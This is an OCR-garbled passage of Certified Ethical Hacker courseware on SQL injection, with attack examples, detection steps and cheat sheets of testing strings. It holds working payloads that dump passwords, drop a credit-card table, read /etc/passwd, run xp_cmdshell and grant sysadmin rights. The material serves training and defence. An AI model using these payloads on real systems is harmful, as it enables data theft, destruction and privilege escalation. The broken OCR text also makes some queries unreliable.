  26. 26. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker that a table named Users exists in the database. A second query could reveal the columns in the Users table. Using this information, the hacker might enter the following into the txtFilter textbox: UNION SELECT 0, UserName, Password, 0 FROM U sers -Entering this query reveals the user names and passwords found in the Users table. p r i v a t e v o id c m d r i lt e r _ c l ic k ( 0b j e c t s e n d e r, S y ste a .E v e n tA rg s e) d g rP ro d u c ts . C u rren tP ag eIn d ex = 0; b in d O a t a O r id () ; ) { p r iv a t e v o id b in d O a ta O rid () ( d g rP ro d u c ts . D ataSource = c r e a te D a ta V ie w (); d g rP ro d u c ts . D a ta B in d ( ) ; ) p r i v a t e D ataV iew c re a te D a ta V ie w () ( s t r in g strC n x = " s e r v e r =lo c a lh o s t ;u id = s a , pwd= datab a se=n o rth w ln d ‫'־‬ ‫־‬ s t r in g strSQL = "SELECT ProductXd, ProductN ane, ■ H " Q u a n tlty P e r U n lt, U n itP r ic e FROM P r o d u c t s ': FIGURE 14.5: BadProductList.aspx Module 14 Page 2011 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  27. 27. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Exam ple 2: Attack A nalysis CEH Urt«fW< ItlMui HMkM SELECT Productld, ProductName, QuantityPerUnit, UnitPrice FRO Products W M HERE ProductName LIKE 'blah' UNION Select 0, username, password, 0 from users — Copyright © b y EG-C0uacil. All Rights R eserved. Reproduction is Strictly Prohibited. E x a m p l e 2: A t t a c k A n a l y s i s Any website has a search bar for the users to search for data and if the search bar can't find the vulnerabilities in the data entered, then it can be used by attackers to create vulnerabilities to attack. W hen you enter the value into the search box as: blah UNION Select 0, username, password, 0 from users. SQL Query Executed: SELECT ProductID, ProductName LIKE ProductName, QuantityPerUnit, UnitPrice 'blah' UNION SELECT 0, FROM Products username, password, 0 FROM USERS WHERE -- After executing the SQL query it shows results with the user names and passwords. Module 14 Page 2012 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  28. 28. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker SQL Injection O O http://|uggyboyshop com Ju g g y B o y S h o p .c o m Search for Products c ‫נ‬ > Attacker Launching SQL Injection J blah' UNION Select 0, username, password 0 from users — Usernam es and Passwords are displayed FIGURE 14.6: Attack Analysis Module 14 Page 2013 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  29. 29. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Example 3: Updating Table E x a m p l e 3: U p d a t i n g T a b l e To create the UPDATE command in the SQL query the syntax is: UPDATE " table_nam e" SET "co lu m n _l" = [new v a lu e ] WHERE {c o n d itio n } For example, say we currently have a table as follows: Table Store Information Store_Nam e Sales Date Sydney $100 Aug-06-2012 Melbourne $200 Aug-07-2012 Queensland $400 AUg-08-2012 Victoria $800 Aug-09-2012 TABLE 14.1: Store Table And we notice that the sales for Sydney on 08/06/2012 are actually $250 instead of $100, and that particular entry needs to be updated. To do so, we use the following SQL query: Module 14 Page 2014 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  30. 30. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker UPDATE Store Information SET S a le s = 250 WHERE s to re name = "Sydney" AND Date = "08/06/2012" The resulting table would look like this: Table Store Information Store_Nam e Sales Date Sydney $250 Aug-06-2012 Melbourne $200 Aug-07-2012 Queensland $400 AUg-08-2012 Victoria $800 Aug-09-2012 TABLE 14.2: Store Table After Updating Ju g g y B o y .c o m Forgot Password Attacker Launching SQL Injection blah'; UPDATE jb-customers SET jb-email - 'info8juggyboy.com' WHERE email ='jason5springfield.com; -- E m a il A d d r e s s Your passw ord will be sent to your registered email address Ml SQL Injection Vulnerable W ebsite SQL Query Executed SEI.F.CT j b - e m a 1 l , j b - p a s s w d , j b - 1 o g i n _ i r i , j b - l a s t _ n a m e F R O M m e m b e r s WHERE ‫־‬ jb-email - ,blah'; UPDATE jb-customers SET jb-email - 'info@juggyboy.com' w h e r e email = ’jasonpspringfield.com; — ■; FIGURE 14.7: SQL Injection Attack Module 14 Page 2015 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  31. 31. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Example 4: Adding New Records CEH u J f 1 1 g g y B o y . c o m t Fo rg o t P a s s w o rd Attacker Launching SQL Injection b la h ’ ; IN S E R T IN T O jb - c u s t o m e r s Em ail Address p a s s w d ' , 1j b ‫ ־‬l o g i n _ i d ' , ' j b ‫־־‬l a s t _ n a m e ' ) ( ' ja s o n @ s p r in g f ie ld . com ' , ' h e l l o ', Your passw ord will be sent to your registered em ail address ( ' jb ‫ ־‬e m a il‫ ' , י‬jb ‫־‬ VA LU ES ' j a s o n ' , ' ja s o n YL s p r in g f ie ld ') ; — SQL Injection Vulnerable Website S Q L Q u e ry E x e c u t e d SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members WHERE email = 'blah1; INSERT INTO jb-customers (‫י‬j b - e m a i l j b - p a s s w d 1 j b - l o g i n _ i d ‫י‬jblast name') VALUES ('j a s o n @ s p r i n g f i e l d .c o m ‫י‬h e l l o j a s o n ', 'jason S p r i n g f i e l d 1); — ‫;י‬ Copyright © b y EG-GlOOCil. All Rights Reserved. Reproduction Is Strictly Prohibited. E x a m p l e 4: A d d i n g N e w R e c o r d s The following example illustrates the process of adding new records to the table: INSERT INTO ta b le name (colum nl, column2, column3. . . ) VALUES ( v a l u e l , v a lu e 2 , v a lu e 3 . . . ) Sto re_N am e Sales Date Sydney $250 Aug-06-2012 M elbourne $200 Aug-07-2012 Queensland $400 AUg-08-2012 Victoria $800 Aug-09-2012 TABLE 14.3: Store Table INSERT INTO table_nam e VALUES ("A d e la id e ", Module 14 Page 2016 (" s t o r e name", " s a l e s " , "d a t e ") "$1000","08/10/2012") Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  32. 32. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker S to re N am e Sales D ate Sydney $250 Aug-06-2012 Melbourne $200 Aug-07-2012 Queensland $400 AUg-08-2012 Victoria $800 Aug-09-2012 Adelaide $1000 Aug-10-2012 TABLE 14.4: Store Table After Adding New Table http://1UHRVboy.com H ■ 1g g y R 0 y.com !' Fo rg o t P a s s w o r d Email Address Attacker Launching SQL Injection Your passw ord w ill be sent to your registered email address 3 b l a h ' ; INSERT INTO jb - c u s to m e r s ( ' j b - e n a i l ' , ‫ י‬b p a s s w d , ‫ י‬j b ‫ ־‬l o g i n _ i d ' , 1j b ‫ ־‬Ia s t_ n a !B © ' ) VA 1XJES ‫י‬a s o n s p r i n g f l e l d . c o r e 1 , , h o l l o ' , ‫ י‬ja s o n ‫^ י , י‬a so n s p r in g fie ld ’ ) ; — (3 1 0 SQL Injection Vulnerable Website V SQL Query Executed SELEC T W H ERE jb - e m a ilf e m a il la s t n a m e ') = jb - p a s s w d , 'b l a h '; VA LU ES jb - lo g in _ id , IN S E R T IN T O jb - la s t_ n a m e jb - c u s t o m e r s FRO M m e m b e rs ( ' j b - e m a i l j b - p a s s w d j b - l o g i n i d j b - ( ' ja s o n @ s p r in g f 1 e ld .c o m ' , * h e l l o ’ ja s o n ' , ja s o n s p n n g f i e l d ') ; — *; FIGURE 14.8: SQL Injection Attack Module 14 Page 2017 Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
  33. 33. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Example 5: Identifying the Table Name C EH BBQ J 1 1 g g y B o y . c o m Forgot Password ■ Em ail Address Your passw ord will be sent to your registered em ail address blah’ AND 1=(SELECT COUNT(*) FROM mytable); -SQL Injection Vulnerable Website You will need to guess table names here S Q L Q u e ry E x e c u t e d SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FR M table W ERE ;jb-email = O H ,blah' A D 1=(SELECT COUNT(*) FR M mytable); —■ N O ; Copyright © b y f ij EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. E x a m p l e 5: I d e n t i f y i n g t h e T a b l e N a m e e so | Ju g g y B o y .c o m Fo rg o t P a s s w o rd Attacker Launching SQL Injection I Email Address blah' A D 1=(SELECT COUNT(*) FR M N O mytable); — Your password will be sent to your registered email address A You w ill n eed to guess tab le n a m es h ere SQL Injection Vulnerable Website S Q L Q u e ry E x e c u te d SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM table WHERE jb-email = 'blah' AND !‫( ־‬SELECT COUNT(*) FROM m y t a b l e ) ; — FIGURE 14.9: Identifying the Table Name Module 14 Page 2018 Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
  34. 34. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Exam ple 6: D eleting a Table J 1 1 g g y B o y . c o m Fo rg o t P a s s w o rd Attacker Launching SQL Injection Em ail Address Your passw ord will be sent to your registered em ail address blah'; DROP TABLE Creditcard; -- J SQL Injection Vulnerable Website S Q L Q u e ry E x e c u t e d SELECT jb-email, jb-passwd, jb-login_id, jk‫־‬last_name FROM members WHERE jb-email = ,blah'; DROP TABLE Creditcard; — '; Copyright © b y EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. * E x a m p l e 6: D e l e t i n g a T a b l e Attacker Launching SQL I j c i n neto blah'; DROP TABLE Creditcard; — SQL I j c i n Vulnerable Website neto S Q L Q u e ry E x e c u te d SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FRO m bers M em W HERE jb-email = ,blah'; DRO TABLE Creditcard; — ‫; י‬ P FIGURE 14.10: Deleting Table Module 14 Page 2019 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  35. 35. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker M o d u le F lo w C EH (•rtifwtf ttkujl IUU1 Copyright © by EG-GtODCil. All Rights R eserved. Reproduction is Strictly Prohibited. 0 - 0 ‫־‬ M o d u le F lo w So far, we have discussed various concepts of SQL injection. Now we will discuss how to test for SQL injection. SQL injection attacks are attacks on web applications that rely on the databases as their background to handle and produce data. Here attackers modify the web application and try to inject their own SQL commands into those issued by the d a tab a se .! SQL Injection Concepts ^* Advanced SQL Injection Testing for SQL Injection SQL Injection Tools Types of SQL Injection ^ Blind SQL Injection ^ v‫— ׳‬ ) Evasion Techniques Countermeasures SQL Injection Methodology Module 14 Page 2020 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  36. 36. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker This section focuses on SQL injection attack characteristics and their detection. Module 14 Page 2021 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  37. 37. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker S T E P 1: Check if the web S T E P 6: Detailed error messages provide a wealth of information to an attacker in order to execute SQL injection application connects to a Database Server in order to access some data S T E P 2: List all input fields, S T E P 5: The UNION hidden fields, and post operator is used to requests whose values could be used in crafting a combine the result-set of tw o or more SELECT SQL query statements S T E P 4: Try to insert a string S T E P 3: Attempt to inject value where a number is codes into the input fields to expected in the input field generate an error Copyright © by EC-CMICil. All Rights Jte$'ervfei;Reproduction is Strictly Prohibited. ^ SQL Injection Detection The following are the various steps to be followed to identify SQL injections. Step 1: Check if the web application connects to a Database Server in order to access some data. Step 2: List all input fields, hidden fields, and post requests whose values could be used in crafting a SQL query. Step 3: Attempt to inject codes into the input fields to generate an error. Step 4: Try to insert a string value where a number is expected in the input field. Step 5: The UNION operator is used in SQL injections to join a query to the original query. Step 6: Detailed error messages provide a wealth of information to an attacker in order to execute SQL injection. Module 14 Page 2022 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  38. 38. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker SQL In jectio n Error M e s s a g e s Attempt to inject codes into the input fields to generate an error a single quote ('), a semicolon (;), comments (‫ ,)־־‬AND, and OR [51 CEH Microsoft OLE DB Provider for ODBC Drivers error '80040el4' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ‫.יי‬ /shopping/buy. aspx, line 52 4C4 1■ U Attacker Try to insert a string v a lu e w h e r e a n u m b e r is expected in th e in p u t field Microsoft OLE DB Provider for ODBC Drivers error '80040607' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'test' to a column of data type int. /visa/credit.aspx, line 17 N ote: If applications do n ot provide detailed e rro r messages and re tu rn a sim ple '500 Server E rror1or a custom e rro r page th e n a tte m p t b lin d in je ctio n techniques Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. SQL Injection Error Messages The attacker makes use of the database-level error messages disclosed by an application. This is very useful to build a vulnerability exploit request. There are even chances of automated exploits based on the different error messages generated by the database server. These are the examples for the SQL injection attacks based on error messages: Attempt to inject codes into the input fields to generate an error a single quote ('), a semicolon (;), comments (-), AND, and OR. Microsoft OLE DB Provider for ODBC Drivers error '80040el4' [M icro so ft][O D B C SQL S e r v e r D r iv e r ][S Q L b e fo re the c h a r a c te r s t r in g ' ' . S e rv e r]U n c lo s e d q u o ta tio n mark /shopping/buy. aspx , l i n e 52 Try to insert a string value where a number is expected in the input field: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [M icro so ft][O D B C SQL S e r v e r D r iv e r ][S Q L S e r v e r ] Syntax e r r o r c o n v e rtin g the v a rc h a r v a lu e ' t e s t ' to a column o f d ata type i n t . / v i s a / c r e d i t . aspx, l i n e 17 Note: If applications do not provide detailed error messages and return a simple '500 Server Error' or a custom error page, then attempt blind injection techniques. Module 14 Page 2023 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  39. 39. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker SQL Injection Attack Characters CEH Urtiftetf ' or ‫ י‬Character string indicators ‫י‬ — ?Paraml=foo&Param2=bar /*.‫/*״‬ + Addition, concatenate (or space in url) 11 (Double pipe) concatenate % Wildcard attribute indicator Useful as nontransactional command © variable Multiple-line comment URL Parameters PRINT or # Single-line comment Local variable (*®variable Global variable w a itfo r d elay •0 :0 :1 0 ‫׳‬ ttkujl lUckM Time delay Displays SQL server version V ©Aversion Copyright © by EG-GtOIICil. All Rights Reserved. Reproduction is Strictly Prohibited. SQL Injection Attack Characters The following is a list of characters used by the attacker for SQL injection attacks: Character Function , o r" Character string indicators - or # - Single-line comment J* *j Multiple-line comment + Addition, concatenate (or space in url) II (Double pipe) concatenate % Wildcard attribute indicator ?Paraml=f00&Param2=bar URL Parameters PRINT Useful as non-transactional command (®variable Local variable (®(®variable Global variable waitfor delay '0:0:10' Time delay (®(®version Displays SQL server version Module 14 Page 2024 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  40. 40. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Additional M ethods to D etect SQL Injection Ex am p le of Functio n Testing F u n c tio n T e s tin g M ethod 1 ► CEH This testing falls within the scope of black s » M e th o d 3 inputting massive amount of random data and observing the changes in the output http:://juggyboy/?param eter=l AND 1=1http:://juggyboy/?param eter=l'- a http:://juggyboy/?param eter=l AND 1=2-- 0 http:://juggyboy/?param eter=l'/* 0 http:://juggyboy/?param eter=l' AND T = ' l » V http:://juggyboy/?param eter=l" & It is an adaptive SQL injection testing technique used to discover coding errors by http:://juggyboy/?param eter=l'# » F u z z in g T e s tin g M e th o d 2 http:://juggyboy/?param eter=l' a V or logic http:://juggyboy/?parameter=123 s box testing, and as such, should require no knowledge of the inner design of the code http:://juggyboy/?param eter=l order by 1000 S ta tic / D y n a m ic T e s tin g Analysis of the web application source co11e # 3 1 Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. Additional Methods to Detect SQL Injection SQL injection can be detected with the help of the following additional methods: (& F u n ctio n T estin g This testing falls within the scope of black box testing, and as such, should require no knowledge of the inner design of the code or logic. F u zzin g T estin g & Fuzzy testing is a SQL injection testing technique used to discover coding errors by inputting a massive amount of data to crash the web application. S tatic /D y n am ic T estin g Static/dynamic testing is the manual analysis of the web application source code. Example of Function Testing: 9 http://juggyboy/?parameter=123 a http://juggyboy/?parameter=r Module 14 Page 2025 Ethical Hacking and Countermeasures Copyright © by EC-C0linCil All Rights Reserved. Reproduction is Strictly Prohibited.
  41. 41. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker © http://juggyboy/?parameter=r# © http://juggyboy/?parameter=r‫׳‬ © http://juggyboy/?parameter=l AND 1=1— © http://juggyboy/?parameter=r‫־‬ © http://juggyboy/?parameter=l AND 1=2-- © http://juggyboy/?parameter=l'/* © http://juggyboy/?parameter=l' AND T = 'l © http://juggyboy/?parameter=l order by 1000 Module 14 Page 2026 Ethical Hacking and Countermeasures Copyright © by EC-C0linCil All Rights Reserved. Reproduction is Strictly Prohibited.
  42. 42. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker SQL Injection Black Box Pen Testing Detecting SQL Injection Issues J J Send single quotes as the input data to catch instances where the user input is not sanitized Send double quotes as the input data to catch instances where the user input is not sanitized CEH Detecting Input Sanitization Use right square bracket (the ] <W> character) as the input data to catch instances where the user input is used as part of a SQL identifier without any input sanitization lL J-. Detecting SQL Modification Detecting Truncation Issues Send long strings of single quote characters (or right square brackets or double quotes) Send long strings of junk data, just as you would send strings to detect buffer These max out the return values from REPLACE and QUOTENAME functions and might truncate the command variable used to hold the SQL statement overruns; this action might throw SQL errors on the page Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. SQL Injection Black Box Pen Testing In black box testing, the pen tester doesn't need to possess any knowledge about the network or the system to be tested. The first job of the tester is to find out the location and system infrastructure. The tester tries to identify the vulnerabilities of web applications from the attacker's perspective. Use special characters, white space, SQL keywords, oversized requests, etc. to determine the various conditions of the web application. The following are the various issues related to SQL injection black box penetration testing: Detecting SQL Injection Issues Send single quotes as the input data to catch instances where the user input is not sanitized. Send double quotes as the input data to catch instances where the user is not sanitized. Detecting Input Sanitization Use the right square bracket (the ] character) as the input data to catch instances where the user input is used as part of a SQL identifier without any input sanitization. Detecting SQL Modification Send long strings of single quote characters (or right square brackets or double quotes). These max out the return values from REPLACE and QUOTENAME functions and might truncate the command variable used to hold the SQL statement. Module 14 Page 2027 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  43. 43. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Detecting Truncation Issues Send long strings of junk data, just as you would send strings to detect buffer overruns; this action might throw SQL errors on the page. Module 14 Page 2028 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  44. 44. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Testing for SQL Injection | Testing String 1 Variations Single code 1‫ ׳‬or T = ' l value' or 'l'= 2 ‫״‬ 1' and T = '2 1 1 1 Testing String Variations I '; drop table Testing String CEH UrtifM IthKJl lUckM Variations admin'-- adm in1 )- ad m in '# admin')# users- l ‫)־‬o r (‫,־־!־‬l valu e') o r ('l'= '2 1+1 3-1 1') and ( T « 2 ‫״‬ 1' or 'a b '= 'a V b 1') o r ('ab'=’a V b 1' or 'ab'='a' 'b 1') or('a b '= ’a " b 1' or 'ab'='a'| |'b 1- 1 1') or (’ab'='a'| |'b 1 or 1=1- Variations ';(SQL Statement];-- ‫ י‬o r '1'='1'— ');[SQL Statement];# ;(SQL Statement];- );[SQL Statement];- ;(SQL Statement];# );[SQL Statement];# ’) or T « ' l ' - value) or (1=2 ');{SQL Statement];- ,;[SQL Statement];!) 1) o r 1=1- 1) o r (1=1 1 or 1=1 valu e or 1=2 Testing String 1( ‫־ ־‬ j valu e + 0 1 and 1=2 1 or 'ab'= 'a V b ' 1) and (1=2 1) or ('ab '= 'a V b ' 1 or 'a b '= 'a "b ' 1) or ('ab'■'•‘ T > l)o r fab'-'a'I !*b' 1 o r ' a b '^ a 'I |'b' Testing String Variations -1 and 1=2- -1) and 1=2- ’ and '1’='2‫—י‬ ') a n d 'IV ? - !/ *co m m e n t*/ Copyright © by EG-CtUIICil. All Rights Reserved. Reproduction is Strictly Prohibited. Testing for SQL Injection Some of the testing strings with variations used in the database handling commonly bypass the authentication mechanism. You can use this cheat sheet to test for SQL injection: F IG U R E 14.11: Testing for SQ L Injection Module 14 Page 2029 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  45. 45. Ethical Hacking and Countermeasures SQL Injection Testing String Exam 312-50 Certified Ethical Hacker Testing String Testing String Testing String 116 or 1=1- %22+or+isnull%281%2F0%29+%2F* 7**/OR/**/l/**/= /**/l 11‫־‬ 6 " or"a"="a ' group by userid having 1=1- ' or 1 in (select (®(®version)- (116) Admin' OR ' EXECUTE IMMEDIATE ,SEL' 1 'ECT 1 US‫ ־‬ER 1 ' 1 ' OR 1=1- ' having 1=1- CRATE USER name IDENTIFIED BY 'passl23' OR 1=1 ' OR 'text' =N'text' ' OR 'l'= 'l ' OR 2 > 1 ; OR T = T ' OR 'text' >'t' %27+— + ' union select l,load_f1le('/etc/passwd'),l,l,l; exec master..xp_cmdshell 'ping 10.10.1.2'- ' union all select @@version‫״‬ ' OR 'unusual' = ,unusual' ' OR 'something' = ,someVthing' ' OR 'something' like 'some%' '; EXEC ('SEL' +'ECT US' +'ER') +or+isnull%281%2F 0%29+%2F* %27+OR+%277659 %27%3D%277659 %22+or+isnull%281 %2F0%29+%2F* ' and 1 in (select var from temp)'; drop table temp exec sp addsrvrolemember 'name', 'sysadmin' ' union select Testing String UNI/**/ON SEL/**/ECT ' OR 'whatever' in ('whatever') ' OR 2 BETWEEN 1 and 3 ' or username like char(37); " or 1=1- Password:*/=l- GRANT CONNECT TO name; GRANT RESOURCE TO name; 'o r 1=1/* ' or 1/* ' union select * from users where login =char(114,lll,lll,116); exec sp_addlogin 'name', 'password' @var select < va S> r as var into temp end - Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. Testing for SQL Injection (Cont’d) Additional testing strings used to test for SQL injection include: Testing String Testing String 116 Testing String l/ • •/ ■ / * * / O R/* * / l / * * / ' UNI/* */ON SEL/‫/ ״‬ECr ' group by userid having 1 * 1 - " or ‫"־־ ״‬a V o r 1 in (select ' EXEC (•SEl' ♦• T EC US-♦ ER) version ^ @ (116) * Admin' OR ‫־‬OR 1 1 ‫-־‬ Testing String %22+or+fsnuM%281%2F0%29+%2F* or 1-1- ‫־‬ll6‫־‬ Testing String having 1 = 1 1 ‫ ;־‬EXECUTE IMMEDIATE SEL‫־ 11 ־‬ECT US* 11 ER* CRATE USER nam e IDENTIFIED BY ‫־‬p assl2 3 ‫־‬ OR 1 1 ‫־‬ , OR ,t e x t ‫ «־‬N.text‫־‬ 'OR ' 1 1 ‫י י‬ ‫־‬ ' OR 2 < 1 (‫״‬ ' union all select vcrsion > § > § ‫״‬ * = 'OR ,unusual 'unusual, ♦or+isnull%281%2F 0 % 2 9 .% 2 F * %27+OR+%277659 %27%3D%277659 %22+or+isnull%281 ' union select l,load_fiIe{/etc/pdSS W d,) , l , l , l ; exec m astei ‫ ״‬xp_andshell ,ping 10.10.1.2‫־‬ - = 'OR ,som ething ' 'OR ,som ething ' '%like 'some ;OR T - T OR ,text 1 <,* ‫ ׳‬t K27+-f union select ' " or 1=1- Password:*/‫ -־־‬l GRANT CONNECT TO nam e; GRANT RESOURCE TO name; * OR 2 BETWEEN 1 and 3 ' or 1-1 /* or ' 1/* ‫ ־‬union select * fro m users w h e re login - char( 114,111,111,116); ’ or username like char ) 37 (; exec sp_9<klsryrolemem ber ‫־‬n a m e ', sysadmin' %2 FO S2 9 + V 2 F* 'so jm e 't'th in g , ' and 1 in (select y^r fro m t e m p ) ‘ ; drop tah le te m p OR ,w h a te ve r' in ' w h a te v e r1( , ( exec sp ..addlogin ,n a m e ', 'password' <®var select ff» « r as var in to te m p end — F IG U R E 14.12: A dditional Testing Strings Module 14 Page 2030 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  46. 46. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker M odule Flow CEH (•rtifwtf ttkujl IU U 1 Copyright © by EG-GtODCil. All Rights Reserved. Reproduction is Strictly Prohibited. M odule Flow So far, we have discussed various SQL injection concepts and how to test web applications for SQL injection. Now we will discuss various types of SQL injection. SQL injection attacks are performed in many different ways by poisoning the SQL query, which is used to access the database. ( SQL Injection Concepts ^ Testing for SQL Injection (C, * Advanced SQL Injection SQL Injection Tools Types of SQL Injection ^ ) Evasion Techniques Blind SQL Injection ^ Countermeasures y — SQL Injection Methodology Module 14 Page 2031 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  47. 47. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker This section gives insight into the different ways to handle SQL injection attacks. Some simple SQL injection attacks, including blind SQL injection attacks, are explained with the help of examples. Module 14 Page 2032 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  48. 48. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Types of SQL Injection 9 CEH U N IO N S Q L In je c tio n Types of SQL Injection The following are the various types of SQL injection: SQL In je c tio n ^ SQL injection is an attack in which malicious code is injected through a SQL query which can read the sensitive data and even can modify (insert/update/delete) the data. SQL injection is mainly classified into two types: Blind SQL Injection W here ever there is web application vulnerability, blind SQL injection can be used either to access the sensitive data or to destroy the data. The attacker can steal the data by asking a series of true or false questions through SQL statements. Simple SQL Injection A simple SQL injection script builds a SQL query by concatenating hard-coded strings together with a string entered by the user. Simple SQL injection is again divided into two types: 9 UNION SQL Injection: UNION SQL injection is used when the user uses the UNION command. The attacker checks for the vulnerability by adding a tick to the end of a ".php? id=" file. Module 14 Page 2033 Ethical Hacking and Countermeasures Copyright © by EC-COUIICil All Rights Reserved. Reproduction is Strictly Prohibited.
  49. 49. Ethical Hacking and Countermeasures SQL Injection 9 Exam 312-50 Certified Ethical Hacker Error Based SQL Injection: The attacker makes use of the database-level error messages disclosed by an application. This is very useful to build a vulnerability exploit request. Module 14 Page 2034 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  50. 50. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Simple SQL Injection Attack CEH System Stored Procedure Attackers exploit databases' stored procedures to perpetrate their attacks Union Query "UNION SELECT" statement returns ;tatement the union of the intended dataset with the target dataset ■ 1e target dataset End of Line Comment # ^ After injecting code into a particular field, legitimate W & ) I V ^ code that follows is nullified through usage of end of line comments SELECT Name, Phone, Address FROM Users WHERE Id=l UNION ERE ALL SELECT ker ,1,1 creditCardNumber,1,1 FROM CreditCardTable Tautology / f L 1 JU J g j SELECT * FROM u s e r WHERE name 'x' AND userid IS NULL; — Injecting statements that are always true so that queries always return results upon evaluation of a Kc o ... W HERE condition data types, names of tables, etc. SELECT * FROM users WHERE name = '' OR '1' ='1'; Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. Simple SQL Injection Attacks A simple SQL injection script builds an SQL query by concatenating hard-coded strings together with a string entered by the user. The following are the various elements associated with simple SQL injection attacks: 9 System Stored Procedure: Attackers exploit databases' stored procedures to perpetrate their attacks. a End of Line Comment: After injecting code into a particular field, legitimate code that follows is nullified through the use of end of line comments. SELECT * FROM u se r WHERE name = 'x ' AND u s e r id I S NULL; — © Illegal/Logically Incorrect Query: An attacker may gain knowledge by injecting illegal/logically incorrect requests such as injectable parameters, data types, names of tables, etc. Q Tautology: Injecting statements that are always true so that queries always return results upon evaluation of a W H ERE condition. SELECT * FROM u se rs WHERE name = Module 14 Page 2035 or ‫ י‬l ‫ ׳= ׳‬l Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  51. 51. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Union Query: ‫״‬UNION SELECT" statement returns the union of the intended dataset with the target dataset SELECT Name, Phone, Address FROM Users W HERE ld=l UNION ALL SELECT creditCardNumber, 1, 1 FROM CreditCardTable. Module 14 Page 2036 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
